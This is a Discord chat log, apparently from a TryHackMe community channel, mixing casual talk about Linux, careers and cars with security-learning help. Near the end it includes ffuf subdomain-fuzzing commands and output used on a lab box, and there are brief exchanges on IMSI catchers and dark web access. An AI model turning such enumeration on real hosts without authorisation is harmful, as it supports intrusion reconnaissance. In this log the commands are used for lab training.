#general
blissful current
wot for?
blissful current
bold rover
glacial berry
Barely visible
blissful current
glacial berry
Mmm
stoic quarry
Yum
blissful current
fading perch
has anyone ever used an IMSI catcher?
stoic quarry
has anyone ever used an IMSI catcher?
Could be illegal to use one depending on where you are
twin ridgeBOT
Gave +1 Rep to @grizzled anchor (current: #3672 - 1)
fading perch
Could be illegal to use one depending on where you are
Is it also illegal to use it to track people's locations?
quick blaze
Is it also illegal to use it to track people's locations?
It depends.
queen flare
Is it also illegal to use it to track people's locations?
generally yes
signal ingot
LMAOOO github WANTS ME TO DO THIS 10 TIMES?! \
what vpn u are using right now?
stoic quarry
Is it also illegal to use it to track people's locations?
Check your local laws. It's usually illegal uess you're law enforcement
mental spoke
this system has GOT to be built by a troll
stoic quarry
Github innit
mental spoke
omggg i got one of the 10 wrong and now i have to do 10 more LMAOOO
stoic quarry
how do they expect me to solve this one
Imagine grandma trying to log into a website and she has to understand this
Godspeed grandma
mental spoke
they wont. even tho thats absurd and nearly impossible to do correctly because the imgs render all broken
imma try to signup on my phone
stoic quarry
Don't they have SSO with Microsoft accounts
mental spoke
if you use microsoft yes
rip its doing it to my phone too they prob flagged my ip. im absolutely not doing that puzzle rn
stoic quarry
Good luck next time ig
narrow yew
lies and lies
stoic quarry
And more lies
queen flare
How do you guys use RFCs for learning about something? Do you guys read them cover to cover or only look into them if u can't find something elsewhere or just google and look other less complicated articles about the topic?
cosmic saddle
guys i have no background in cybersecurity i just signed up for thm where and what should i start with?
sturdy sequoia
guys i have no background in cybersecurity i just signed up for thm where and wh...
lucid pumiceBOT
:hammer: eyesprep0720#0 has been banned.
cosmic saddle
what do i type here i said cybersecurity and it says its wrong
narrow yew
what do i type here i said cybersecurity and it says its wrong
Read the text above
and then read the question
cosmic saddle
and then read the question
ok i did that and it worked
mortal sparrow
what do i type here i said cybersecurity and it says its wrong
Ew
Security analyst
Be a man and do penetration testing
cosmic saddle
Ew
Security analyst
Be a man and do _penetration testing_
ok i guess
i am still new so i have no background on anything
narrow yew
Ew
Security analyst
Be a man and do _penetration testing_
you work with that?
I thougt you were still in school
cosmic saddle
I thougt you were still in school
i still i am
narrow yew
Not you, the Yon guy taking a piss on Soc analyst's
while not having a job, the irony
cosmic saddle
Not you, the Yon guy taking a piss on Soc analyst's
which is better cuz i am lost now what to learn first
or what to do
mortal sparrow
I thougt you were still in school
Fah nah
I'm 22
mortal sparrow
while not having a job, the irony
Fuck u mean bro I'm studying
I work as a software dev
narrow yew
Did you not write the other day you were studying from home
mortal sparrow
Ain't u got sum better to do than to be a prick?
mortal sparrow
Did you not write the other day you were studying from home
Yeah... U can work from home too
It's a thing in these days
cosmic saddle
ok i will just learn pen testing sounds more fun tbh
narrow yew
ok i will just learn pen testing sounds more fun tbh
you can do that in soc also, not a problem at all
mortal sparrow
ok i will just learn pen testing sounds more fun tbh
Hehe
I was joking but sure
I think pentesting is the basis to know before being in SOC
cosmic saddle
Hehe
I was joking but sure
I think pentesting is the basis to know before being ...
so i leaen pen testing then SOC ?
narrow yew
You will learn it on the path to SOC also
cosmic saddle
should i leanr any coding languages too?
narrow yew
For you personally sure, coding needed for SOC you will learn anyways
queries, pulling data, building playbooks etc
stoic quarry
Hehe
I was joking but sure
I think pentesting is the basis to know before being ...
I'd say the opposite tbh
That and you're more likely to get a SOC job than a Pentesting job
Pentesting is definitely sexier and is what people think of when you say you work in cybersecurity, but most businesses need defending
Pentests for Audits are nice but depending on where you are those will usually be annually and done by an external contractor
narrow yew
Thanks @stoic quarry
twin ridgeBOT
Gave +1 Rep to @stoic quarry (current: #99 - 110)
stoic quarry
Pentesting looks sexy
A tiktok video of someone rooting a machine gets more views than someone going through pcaps to find which IP is conducting a port scan y'know
blissful current
blissful current
Pentesting looks sexy
coz they want to ||hack their GF's Insta account||
stoic quarry
It's commonly that aye
blissful current
stuck ridge
My government made a laws when ads have to skipable after 5 secs
stoic quarry
Based
stuck ridge
And yall are not
mental spoke
setting up depencencies for a build on win11 may be my 13th reason
windows can actually eat my shit.
im so done with it. microslop can go die
stoic quarry
How are you installing it?
mental spoke
chocolatey and having to deal w cmake
im just over it. windows genuinely sucks. if i was using linux i would have been done 30 mins ago.
stuck ridge
stoic quarry
Do you build them often? If so just write a script to do it all so you can scale easier
mental spoke
Do you build them often? If so just write a script to do it all so you can scale...
i did exactly that it just wanted to break itself 15 times.
stoic quarry
Lmao
mental spoke
MSVC just has a load of nonsense
stoic quarry
Lmao
mental spoke
installed the 2022 community tools, watched the package break itself and im abt to take my windows m.2 and burn it in a fire
i will attempt to migrate to using that instead because yeah this is a massive headache like genuinely
bold rover
stoic quarry
https://tenor.com/view/linux-gif-26421669
Specifically anime girl desktops
Hate it lol
Who stares at their desktop all day
mental spoke
im doing all of this just to get a build going on a stupid ass software
"just install the dependencies"
install my foot into your rear
they did but because im modifiying the fork ill need to be able to build it myself
100% agreed there
would be wayyy better
This better save the day
stoic quarry
It's MS
mental spoke
i have such a huge project ahead of me and im over here getting choked out by some dependencies
good point ๐ญ
mm rust
rust makes things sm easier. its efficient
my project will take months and thats if i can even properly pull it off, ill need collaborators over time
thank you its all a static html file LOL
not today LOL. skipping the framework stack to focus on actually building technical documents for this project
I need to go and place an order for a New raspberry pi 5 and another pico and a MCP4728 I2C DAC breakout board and a few other things
worldly pollen
I have some question abt security enginner role who can help me
worldly pollen
try to use torbrowser but make sure to stay secure
and u can also combinate with tails
stuck ridge
Why do you need?
worldly pollen
hiddenwikki
stuck ridge
You arent going there just to take 2 screenshots and scare your friends
-# the fact that there isnt any website there
The darkweb isnt for curiosity. It is too dangerous
worldly pollen
if u are gonna do that lemme know I wanna see them
stuck ridge
Your information, everythings.
Wdym
Only enter the darkweb with a popurse
Yes.
It is very scary.
You shouldn't go in there.
Darkweb.
Even we are scare of the darkweb. The ethical hackers you know.
You shouldn't go there.
I bet it is not your real address dang
stoic quarry
๐ค
stuck ridge
Never. It is very scary.
It is the most deepest area in the internet. You shouldn't never go there.
stoic quarry
Why
faint vigil
It is the most deepest area in the internet. You shouldn't never go there.
lmfao
stoic quarry
For what
stuck ridge
NO, never.
stoic quarry
What fun
stuck ridge
DONT EVER go there
stoic quarry
There isnt much "fun" to be had lmao
faint vigil
Should I stick with windows 11 or try Ziron?
stoic quarry
Should I stick with windows 11 or try Ziron?
What's your use case?
stuck ridge
Actually it isnt that scare bruh
stoic quarry
Windows is fine
faint vigil
What's your use case?
Gaming, and doing thm
stoic quarry
Windows probably best
faint vigil
so Vms sometimes
stoic quarry
I'd recommend having a Linux VM so you can learn tools properly
faint vigil
Windows probably best
true specially with things like fornite
stuck ridge
It is not that scare bruh, just get full opsec, dont click on random links, do not download anything, use vpn and tor and you r good
faint vigil
I'll just install it on my other pc that already has mint lol
mental spoke
dont worry im still at it trying to get this build to work
stoic quarry
Use a VPN and tor
Bruh
stuck ridge
Also, there isnt any "organs seller" or "red room" on there, they r all fake or creepy pasta
stoic quarry
I'll just install it on my other pc that already has mint lol
Fair enough
mental spoke
ahh yes the ppl that think using TOR with a VPN is a good idea
stuck ridge
But u might find scary website that only used to scare you ahh
Btw, u might find some criminals markets in there, which sell drugs or exploits
stoic quarry
I'll just install it on my other pc that already has mint lol
Fair enough
mental spoke
Never use a VPN with tor at the same time.
stoic quarry
Depends if you trust exit nodes
stuck ridge
And if you found an exploit abt discord. Remind us :))
stuck ridge
Never use a VPN with tor at the same time.
Why?
stoic quarry
Some vpn providers won't let you anyway
stuck ridge
Welp, also if you want more opsec. Use vm
stoic quarry
Uh
mental spoke
Why?
A few major reasons. Tors design philosophy is built around eliminating the need for any single trusted entity. when you add a VPN you reintroduce that. and ontop of that your vpn provider sees you are connecting to tor and knows your real ip. you replaced your ISPs visibilty with the vpns and thats actually a worse trade most times since ISPs are regulated and vpns lie about logging. and if the VPN is subpoenaed or compromised your exposed. and ontop of that you gain almost nothing. theres really no good trade off for it and you increase your attack surface
stoic quarry
Welp, also if you want more opsec. Use vm
No?
mental spoke
i keep trying to use Ctrl + alt + T on windows and im losing my mind
stoic quarry
You can use a VM and have 10+ proxies, but if you post "Hey guys I live in X city" then you have shit OPSEC no matter how complicated you made your setup
stoic quarry
i keep trying to use Ctrl + alt + T on windows and im losing my mind
I feel that
mental spoke
I feel that
It drives me nuts im abt to make it a custom keybind
im so used to linux atp
mental spoke
ill end up using razer synapse in my case because it allows custom macro creation
but auto hotkey is a good choice still
stoic quarry
Fair
mental spoke
esp for ppl without keyboard software
i love the linux community. razer decided to not make linux support so they went and reverse engineered synapse and made an open source fork of it and made the hardware detectable in custom applications easier
and its WAY better than razers dookie windows software
mental spoke
yes its actually awesome. its a lot faster than razers setup and they removed all the bloat and bs
stoic quarry
I have Razer stuff but don't really care about making my keyboard go red yk
And KDE has easy keybinds
mental spoke
i completely understand that tbh, i use it because i have a 60% and need to add certain macros to spots for keys im missing or i use to to change my dpi
KDE is amazing for that
stoic quarry
True. Mind sending me a link? I need to adjust the DPI lmao
mental spoke
my main distro i use is KDE and arch based
mental spoke
True. Mind sending me a link? I need to adjust the DPI lmao
yes one sec
stoic quarry
My mouse is either slow, fast, too fast, way too fast, or stupid fast
mental spoke
yay -S razergenie < this is the gui for the driver
or sudo apt install razergenie if debian
lucid pumiceBOT
:hammer: tet_66#0 has been banned.
mental spoke
he got snipped rq
stoic quarry
https://openrazer.github.io/
Thanks!
twin ridgeBOT
Gave +1 Rep to @mental spoke (current: #761 - 10)
sturdy sequoia
+rep @cloud quiver
twin ridgeBOT
Gave +1 Rep to @cloud quiver (current: #1 - 6130)
mental spoke
make sure to add yourself to plugdev or things wont work sudo gpasswd -a $USER plugdev
if you have issues just ask claude to help you install it, super easy and takes like 5 commands max to get it all working
you can also just use polychromatic instead of razergenie
stoic quarry
I'll probs just read docs but cheers
mental spoke
just easier for some ppl to do that then read docs, if youre comfortable with computers docs are no issue
stoic quarry
I also just don't like LLMs lol
mental spoke
completely understandable
stoic quarry
Watched someone use Claude to find the average of 7 numbers yesterday
mental spoke
some ppl rely on it WAY to much and are gonna become braindead
stoic quarry
Truly a tool the likes of which haven't been seen before
weak rampart
my main distro i use is KDE and arch based
also kde user here, it's fire
stoic quarry
Yeah its nice
mental spoke
i use garuda linux and love it
stoic quarry
Neat
bold rover
@weak rampart sup ๐
mental spoke
I wanna mess with this flavor of garuda but havent yet
mental spoke
some ppl here would really dislike the flavor i daily tho LOL its really extra and colorful
bold rover
some ppl here would really dislike the flavor i daily tho LOL its really extra a...
Who gives a fuck
You like it
You use it
mental spoke
exactlyyyyyy
bold rover
mental spoke
i enjoy it even tho its a bit heavy
bold rover
i enjoy it even tho its a bit heavy
This is cool too
weak rampart
i met so many people
bold rover
I'm so hyped dude
Cool
weak rampart
met a dude from my country's national cyber team
mental spoke
its pretty fun. its a very clean distro theme wise and they did a great job
bold rover
i met so many people
-# we do it daily
weak rampart
-# we do it daily
i don't
weak rampart
it's new to me
bold rover
it's new to me
Right
weak rampart
yes
bold rover
its pretty fun. its a very clean distro theme wise and they did a great job
That's nice
I'm more of a weeb
https://tenor.com/view/velzarii-velzarii-vt-velzarii-vtuber-vtuber-envtuber-gif-12521535542759742181
So i like mine colourful
blissful current
stoic quarry
Gl
mental spoke
after 2 hours of fighting dependencies i got the build complete... that took WAY too long holy
bold rover
kde is great for colorful things
Trash ๐๏ธ๐๏ธ๐๏ธ
fading perch
Trash ๐๏ธ๐๏ธ๐๏ธ
share the wallpaper pls
fading perch
I got more
where did you get it from
bold rover
where did you get it from
fading perch
https://tenor.com/view/secret-boss-baby-on-the-phone-gif-7991222
just share to me
fading perch
Just say wallpaper
wallpaper
rocky night
<@864378875185070111>
Idc
fading perch
<@864378875185070111>
Snowie has fallen on the battlefield
fading perch
RIP Snowie
sick lance
@brisk tree Fucked off back home yet?
bold rover
RIP Snowie
Fr
bold rover
RIP Snowie
Ok, now go study
bold rover
Ok, now go study
I'll send the wallpapers tonight
fading perch
I will beat 0day
bold rover
<@291298445048676353> what do you think?
Lol, yesterday i pinged skidy and got a warning
quick blaze
Lol, yesterday i pinged skidy and got a warning
What for?
quick blaze
..For pinging Skidy?
Sounds dumb. ๐
weak rampart
Trash ๐๏ธ๐๏ธ๐๏ธ
What's that???
sick lance
Lol, yesterday i pinged skidy and got a warning
Was it automod?
bold rover
Was it automod?
No someone did it
quick blaze
Interesting.
sick lance
I see @lone thistle is back on the mod team.
bold rover
no I'm asking for real, what's this graphical thing called
Arch with hyprland
bold rover
Cool
weak rampart
nevermind, i might use it when i eventually switch to arch though
quick blaze
Trash ๐๏ธ๐๏ธ๐๏ธ
Crazy setup btw.
weak rampart
my linux mint would never
sick lance
People who use Arch aren't hackers.
They're too busy customising their GUI and telling people they use Arch, to actually do any hacking.
weak rampart
People who use Arch aren't hackers.
if i use it, it'd be so i master linux stuff, not for hacking
bold rover
Crazy setup btw.
weak rampart
They're too busy customising their GUI and telling people they use Arch, to actu...
what do you use for hacking
sick lance
or you don't care about these stuff
Wdym?
sick lance
https://tenor.com/view/is-someone-jealous-daniel-espinoza-kevin-alejandro-detect...
...Jealous of what. exactly?
quick blaze
kali minimal?
There's only one version. Kali.
sick lance
There's only one version. Kali.
Incorrect.
bold rover
There's only one version. Kali.
Wrong
quick blaze
Incorrect.
Is it.
sick lance
You have Purple Kali.
bold rover
Bro
bold rover
You have Purple Kali.
Exactly
quick blaze
๐ค๐ฒ
bold rover
First I'm hearing of it...
Tf
bold rover
What's the difference
Security based
bold rover
I guess
weak rampart
Wdym?
i was trying to ask, do you care if it comes pre installed with all the 50 tools or would you prefer it to come as minimal as possible (aka clean) and you install only what you need
bold rover
I just use too much remnux and commando so.
Ohh i see
sick lance
i was trying to ask, do you care if it comes pre installed with all the 50 tools...
I install all toold.
Then my own, and other tools which doens't come in Kali.
sick lance
First I'm hearing of it...
It only came out, I dunno, 2 years ago? lol.
It's a Kali release with more blue tools than normal Kali.
bold rover
It's perfect for bleu
quick blaze
Ohh i see
I do everything on remnux, unless it's disk forensics or windows file analysis or crazy windows log analyss, zimmerman toolkit and stuff like autopsy helps out a lot here.
I hate windows log analysis but meh.
quick blaze
It's a Kali release with more blue tools than normal Kali.
Will look into it, thank you.
twin ridgeBOT
Gave +1 Rep to @sick lance (current: #2 - 3970)
stoic quarry
Something super basic
bold rover
Kali Purple didn't have curl on release didnt it?
Ya it was Missing essential Stuff
stoic quarry
Lmao
quick blaze
Ya it was Missing essential Stuff
Is it better maintained/packed now?
bold rover
I use AB wallpaper too.
For a second i thought that was attackbox
bold rover
Is it better maintained/packed now?
Don't know, don't use it
stoic quarry
Is it better maintained/packed now?
Seems so
quick blaze
I land back home in 9 hours...got two days to prep for a CTF first and then I'll see.
stoic quarry
Hell yeah
bold rover
I land back home in 9 hours...got two days to prep for a CTF first and then I'll...
Cool
quick blaze
See how it feels
In my balls....innit.
sick lance
For a second i thought that was attackbox
It may as well be, I have pretty much all of it on my Kali.
Kek
bold rover
Rest well
bold rover
It may as well be, I have pretty much all of it on my Kali.
Lol
bold rover
In my balls....innit.
quick blaze
Honestly fair. Niki Lauda used to say that he had a great ass, that's why he felt the car components and the way it drove.
copper flame
Honestly fair. Niki Lauda used to say that he had a great ass, that's why he fel...
lauda?
quick blaze
We should be having good balls to know what tools tingle em good or not innit.
bold rover
Austrian F1 driver.
One of the best one
copper flame
Austrian F1 driver.
oh i thought in hindi it was.. uhh.. leabe it
bold rover
Liked his movie
bold rover
oh i thought in hindi it was.. uhh.. leabe it
quick blaze
Liked his movie
Good stuff, a good portrayal as well, he liked it.
copper flame
Liked his movie
u mean max verstappen?
bold rover
u mean max verstappen?
copper flame
https://tenor.com/view/sasuke-thinking-anime-naruto-gif-13593873
starring brad
quick blaze
https://tenor.com/view/sasuke-thinking-anime-naruto-gif-13593873
I'm a merc guy ey...
You too?
I'm also a huge Ferrari/Italy guy so Antonelli in Merc makes it even better for me. :)
stoic quarry
Suzuki swift rise up
quick blaze
The depression.
quick blaze
๐ญ.
Oh damn.
Sounds strange, the 488 has a pretty reliable engine, shares it with other variants too.
Gearbox is good too.
What's it been in the workshop for all those times?
This is bullshit.
I will not take this disrespect. Fucking lambos.
He might've gotten a bad model? could just talk to Ferrari about it? Has he done that yet?
stuck ridge
I feel so burn out
quick blaze
Weird. 488 doesn't have many reliability issues.
AMG GTs are super nice yeah.
Honestly I like the c8, looks nice!
Yuuurrrr.
They're not as expensive as the AMG GTs or 911s too.
But I still like me some Merc/Ferrari
True true. ๐
stuck ridge
THE ESCALATION MODULES IS F*CLING TORTURE
quick blaze
๐
quick blaze
Nah, i just feel so burn out
Then don't do the module. ๐
stuck ridge
Uh so there is a war goin on?!
Iran is trying against 15 others countries
eager marsh
Then don't do the module. ๐
Say hi to Slava and Kib for me
quick blaze
Say hi to Slava and Kib for me
Will do!
topaz steeple
Iran is trying against 15 others countries
Well, yeah
bold rover
Say hi to Slava and Kib for me
Hii vader hru?
eager marsh
Hii vader hru?
Iโm good
stuck ridge
I cannot sit here and read information anymore๐ญ Im need a CTF..I NEED A CTF HAHAHADKSKAJ
oak river
How's everyone today?
bold rover
Iโm good
Nice to hear that
oak river
I cannot sit here and read information anymore๐ญ Im need a CTF..I NEED A CTF HAH...
Just get more RAM and do vulnhub
oak river
Get some Menthyl isovalerate
quick blaze
I cannot sit here and read information anymore๐ญ Im need a CTF..I NEED A CTF HAH...
A good CTF this weekend.
DiceCTF.
Have fun.
quick blaze
WHERE, WHERE, I NEED IT
acoustic crystal
sick lance
Say hi to Slava and Kib for me
No, say hi yourself.
hallow hazel
hi scrubz
sick lance
Hai
hallow hazel
what's up on this fine thursday
stuck ridge
Just get more RAM and do vulnhub
What is that
sick lance
A platform you can download VMS from, taken over by htb
oak river
What is that
Virtual machines that are ready to be deployed through something like Oracle Virtualbox and you are supposed to use your knowledge to get a flag/file/access or full control at the target machine
sick lance
You'll find a few of the machines on them on there.
stuck ridge
Virtual machines that are ready to be deployed through something like Oracle Vir...
I already have a homelab?
Can i do it on my homelab?
oak river
A platform you can download VMS from, taken over by htb
By the way, do you think that people with little knowledge/experience are also okay to participate in any ctf's?
oak river
Can i do it on my homelab?
Of course
stuck ridge
By the way, do you think that people with little knowledge/experience are also o...
Yes, if they can find the flags
oak river
I haven't really done anything on vulnhub but you should be able to, there are guides
sick lance
By the way, do you think that people with little knowledge/experience are also o...
Yes.
You'll learn stuff regardless of how you do.
stuck ridge
If they can they can
oak river
Yes.
You'll learn stuff regardless of how you do.
I guess this is like that time where I had to recover a windows password on an unencrypted laptop
Never had done it before, but once I sat I did it
for the first time ever with chatgpt lol
Hiren'S boot
sick lance
If you're like me, you'll learn more about yourself failing, than you will being successful.
oak river
If you're like me, you'll learn more about yourself failing, than you will being...
I believe failure is a success in itself
If we didn't fail we wouldn't be able to succeed
sick lance
I believe failure is a success in itself
It certainly is.
bold rover
By the way, do you think that people with little knowledge/experience are also o...
That's how you learn, trial and error
oak river
Lately I feel very tired of theory to be fair
stoic quarry
Go slightly deeper than what you know and you'll learn faster than sticking in the stuff you're comfortable with
eager marsh
No, say hi yourself.
Lmao
stuck ridge
Finally...
sick lance
Finally...
PT1 next.
stoic quarry
Time to wash cars until you get money ig
stuck ridge
Time to wash cars until you get money ig
i have money, enough, only thing that is my parents wont allow me to buy such as a thing
oak river
My goal is achieved...
tame axle
hello ppl
tame axle
Going for a lunch break, brb
alr
tame axle
Finally...
good job 
bold rover
I can finally call myself a hacker๐ฅน
stuck ridge
https://tenor.com/view/yuji-stare-yuji-itadori-jjk-jujutsu-kaisen-yuji-stare-mem...
What is wrong?
agile topaz
I can finally call myself a hacker๐ฅน
bold rover
What is wrong?
How to perform a reverse shell
Tell me
No using online sources, be true to yourself
stuck ridge
Tell me
Uhm uhmmm, first uhmm get the- the payload? Oh nah get the shell on - on target with privilege user and then then execute the payloads. And use a uhm and uhm wait no uhmmm
Jk
stuck ridge
No your not
Nooooo
stuck ridge
https://media.discordapp.net/attachments/929079030588788789/1095374475341598751/...
What is this?
agile topaz
What is this?
A gif
weak rampart
https://tenor.com/view/caseoh-pressure-washer-gif-3872867363977153281
caseoh mentioned
stoic quarry
Bro is gatekeeping in the TryHackMe discord
stoic quarry
caseoh mentioned
What is that
weak rampart
I can finally call myself a hacker๐ฅน
@manic oyster eliminate the competition early
stoic quarry
Okay
weak rampart
you don't know him?
stuck ridge
<@1408834574749794368> eliminate the competition early
He is not anything to me๐
stoic quarry
Nope
weak rampart
I'd be more worried about DrOPSEC
stuck ridge
I ddosed 67 people, google, cloudflare, etc๐
sick lance
<@1408834574749794368> eliminate the competition early
At what point do you consider this harassment?
weak rampart
At what point do you consider this harassment?
dude I'm joking
stuck ridge
I'd be more worried about DrOPSEC
I have his ip๐ im the final boss hecker
weak rampart
i mean I don't know
stuck ridge
dude I'm joking
Bro pinged him like 6767 times
weak rampart
lowkey yeah
if he was actually active and not just troll alt account he'd just block me lowkey
sick lance
Because that would make it better...
weak rampart
yeah
bro you can't say his account is made seriously
that's obviously a joke account
sick lance
Doesn't mean they deserve to be pinged 2-4 times a day. ๐
weak rampart
i like pinging him, he's funny
stuck ridge
Should i make an account for you to ping?
weak rampart
no
stuck ridge
Ok
weak rampart
i want iphacker specifically
stoic quarry
You'd be surprised what watching 1 episode of Mr. Robot will do to you
stuck ridge
You'd be surprised what watching 1 episode of Mr. Robot will do to you
Then you gonna go learn how to hack and give up cuz it is too hard or go with skid way (99,98%)
stoic quarry
I don't understand half of that
stuck ridge
Now im a hecker๐
glacial berry
sick lance
Now im a hecker๐
Get a train on your CLI.
stoic quarry
๐
stuck ridge
Get a train on your CLI.
Bruh, idk if parrot repo have it
mortal sparrow
did someone manage to do the takeover box lately?
https://tryhackme.com/room/takeover
โฏ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
-H "Host: FUZZ.futurevera.thm" \
-u https://futurevera.thm \
-k -fw 1511 -fs 4605 \
-o takeover.json -of json
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://futurevera.thm
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.futurevera.thm
:: Output file : takeover.json
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 4605
:: Filter : Response words: 1511
________________________________________________
:: Progress: [100000/100000] :: Job [1/1] :: 578 req/sec :: Duration: [0:03:00] :: Errors: 0 ::
like tf?
sick maple
Snowie has fallen on the battlefield
u need wallpapers?
finite basalt
We got tryhackme HS2 before we got HS2 ๐ฎโ๐จ
sick lance
did someone manage to do the takeover box lately?
https://tryhackme.com/room/tak...
Kek
sick lance
bro wdym ~kek~?!?!?!
Why are you looking for a json file?
mortal sparrow
its not looking its output
sick lance
Tried a different directory list?
sick maple
https://discord.com/channels/521382216299839518/680459914828972076/1211364767986...
sl but more colors
nice
sick lance
`sl` but more colors
lolcat makes everything rainbow.
mortal sparrow
Tried a different directory list?
tried like 5 different ones
even rockyou at some point
mortal sparrow
I KNOW AND I STILL TRIED IT
sick lance
One moment.
finite basalt
Are you saying there's nothing found inside the json output?
mortal sparrow
there's output but no hits
it wouldve shown on the term too
finite basalt
is there a dns server for the box that you query?
sick maple
`lolcat` makes everything rainbow.
ohhhh
mortal sparrow
is there a dns server for the box that you query?
nothing was mentioned in the description of the box...
I did add the IP to the hosts file
there's this in one of the writeups.
I dont understand how he came into that conclusion
finite basalt
nothing was mentioned in the description of the box...
I did add the IP to the h...
I'd personally try the Discovery/DNS/namelist.txt wordlist, maybe sublist3r, dnsrecon or just a simple dig
tame moss
I believe you have to manually enumerate instead of using ffuf or other tools
sick lance
mortal sparrow
<:kekw:658061932577816606>
bro what the fuck
sick lance
bro what the fuck
And I literally just done that there.
mortal sparrow
that's fucking cap bro
what????
why did it work for u and not me?
sick lance
Add in -u https://10.10.125.247
finite basalt
Yeah I wonder if it's struggling with resolving the IP from hosts maybe
sick lance
ffuf -u https://10.10.125.247 -fs 0,4605 -H "Host: FUZZ.futurevera.thm" -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
@ocean wasp May I help you?
finite basalt
I assume it's because it's sending the requests from the host you define rather than the fuzzed host (in terms of headers)?
finite basalt
```bash
ffuf -u https://10.10.125.247 -fs 0,4605 -H "Host: FUZZ.futurevera.thm" ...
does it work if you change it from IP to hostname?
mortal sparrow
does it work if you change it from IP to hostname?
running it now
runs slow but i will let you know
sick lance
does it work if you change it from IP to hostname?
Nah.
finite basalt
yeah I'm guessing it's a header thing maybe?
mortal sparrow
```bash
ffuf -u https://10.10.125.247 -fs 0,4605 -H "Host: FUZZ.futurevera.thm" ...
oh my mistake I copied your command and forgot about the IP
yeah I got 2 bingos, blog and support
pure steeple
ffuf doesnโt set headers automatically, this has bitten me in the past
mortal sparrow
it is an issue with resolving the url
sick lance
yeah I'm guessing it's a header thing maybe?
Yeah, it's using the IP as the main lookup, and futurevera as the header.
Equivalent to house and mailbox
mortal sparrow
Yeah, it's using the IP as the main lookup, and futurevera as the header.
Equiv...
why does it work like that?
can u explain im geniouly curious
how do u spell that work?
pure steeple
-H is for header
finite basalt
Yeah that was my guess was that it was sending direct to the "mailbox"
mortal sparrow
-H is for header
like the header for the request?
so why did enum on the url didnt work but the IP did?
urban ravine
I just across something that personally I think is insane. I was trying to find an old friend of mine. All I did was give google ai a couple pieces of information and it gave me her whole back story and what area sheโs from. Obviously I know where sheโs from but ๐ I dunno. It rubs me the wrong way.
sick lance
like the header for the request?
so why did enum on the url didnt work but the I...
You're using the IP to look up the website, but using the host to specify.
pure steeple
like the header for the request?
so why did enum on the url didnt work but the I...
Sometimes there will be multiple sub domains, urls at the same ip
mortal sparrow
You're using the IP to look up the website, but using the host to specify.
nah I figured that out
but why
I hit some weird wildcard when I was running domain with the host header, like I got returned 200 for every single entry
pure steeple
Server may be configured to catch all urls (with a wild card) and redirect to a single pattern?
mortal sparrow
Server may be configured to catch all urls (with a wild card) and redirect to a ...
possible
but every single one?
idk seemed abit off
never encountered it before
pure steeple
Creator might have wanted to make the fuzzing a bit more of a challenge
People might do it to avoid broken links, for weird search engine optimization purposes
mortal sparrow
People might do it to avoid broken links, for weird search engine optimization p...
good point
pure steeple
lucky for you, you get to practice your filtering
tame axle
guys my school asked to make a cv because we have smth called work experience and i put my skills dose it look alr ? pls dont flame me
wet eagle
guys my school asked to make a cv because we have smth called work experience ...
it looks good in my opinion ๐
pure steeple
Have you actually done red teaming?
tame axle
Have you actually done red teaming?
i meant to put offensive security mb
pure steeple
offensive security ( then give details )
tame axle
offensive security ( then give details )
thx
twin ridgeBOT
Gave +1 Rep to @pure steeple (current: #136 - 77)
pure steeple
What are you referencing with "permission-based"?
wet eagle
Perhaps he didn't want to sound like a black hat
tame axle
What are you referencing with "permission-based"?
that i dont do illeagal shit
pure steeple
that i dont do illeagal shit
You probably don't need to state this on a resume, it's implied
tame axle
oh alr thx
pure steeple
Better to give examples of which offensive security areas you have skills in
Whether it is web, active directory, network/MITM, wireless, malware etc etc.
stuck ridge
"Can you hack this account for me?"
"sorry, i only master osint"
tame axle
Whether it is web, active directory, network/MITM, wireless, malware etc etc.
thanks for the help
twin ridgeBOT
Gave +1 Rep to @pure steeple (current: #134 - 78)
stuck ridge
There was a guy tell me to hack something in tiktok
wet eagle
Guys I have a question that I hope you could help me with, I was wondering with what language should I start with? Python 3 or C++? Thanks!
stuck ridge
Guys I have a question that I hope you could help me with, I was wondering with ...
Python
Ofc
pure steeple
nah, C
tame axle
Guys I have a question that I hope you could help me with, I was wondering with ...
python its fun and useful
stuck ridge
It is the easiest language and the most common know to beginner
pure steeple
go do CS50
wet eagle
hmm
tame axle
go do CS50
u mean the harvard cert ryt ?
wet eagle
I'm pretty much a beginner after all
pure steeple
u mean the harvard cert ryt ?
it is a free online Harvard class, intro to CS, yes
stuck ridge
I'm pretty much a beginner after all
Go python
tame axle
it is a free online Harvard class, intro to CS, yes
yh i did that
pure steeple
CS50 teaches C to start and moves into Python
tame axle
C
bro C takes time i lost so much of hair learning that and i still cant program it properly
wet eagle
Okayy
pure steeple
bro C takes time i lost so much of hair learning that and i still cant program...
hair losing == learning
tame axle
its free and useful for the basic understanding
pure steeple
compsci is the foundation of compsec
wet eagle
what's the difference between a degree in computer science and some tinkerer/bounty hunter? ๐ค
stuck ridge
Malware analyse
wet eagle
finna go bald by 18
I think many computer science students end up like that ;-;
pure steeple
AI already took your job, enjoy your retirement at 18
tame axle
AI already took your job, enjoy your retirement at 18
not cybersed
stuck ridge
what's the difference between a degree in computer science and some tinkerer/bou...
Bounty hunter is just for more trusty. Cs is for more chance to get hire
Welp
wet eagle
AI already took your job, enjoy your retirement at 18
I have a question, does AI also take over with cyber security?
wet eagle
Bounty hunter is just for more trusty. Cs is for more chance to get hire
Oh okay, thx!
twin ridgeBOT
Gave +1 Rep to @stuck ridge (current: #500 - 16)
pure steeple
I have a question, does AI also take over with cyber security?
yes
wet eagle
?
pure steeple
we're in TryHackMe, house of the AI, you must say yes
stuck ridge
Oh okay, thx!
You can go bug bounty if you have enough knowledge to find a bug and the company will pay for you if the bug is valid.
tame axle
You can go bug bounty if you have enough knowledge to find a bug and the company...
i wnna get paypal acc setup but my parents aint letting
wet eagle
You can go bug bounty if you have enough knowledge to find a bug and the company...
Ooo okay
stuck ridge
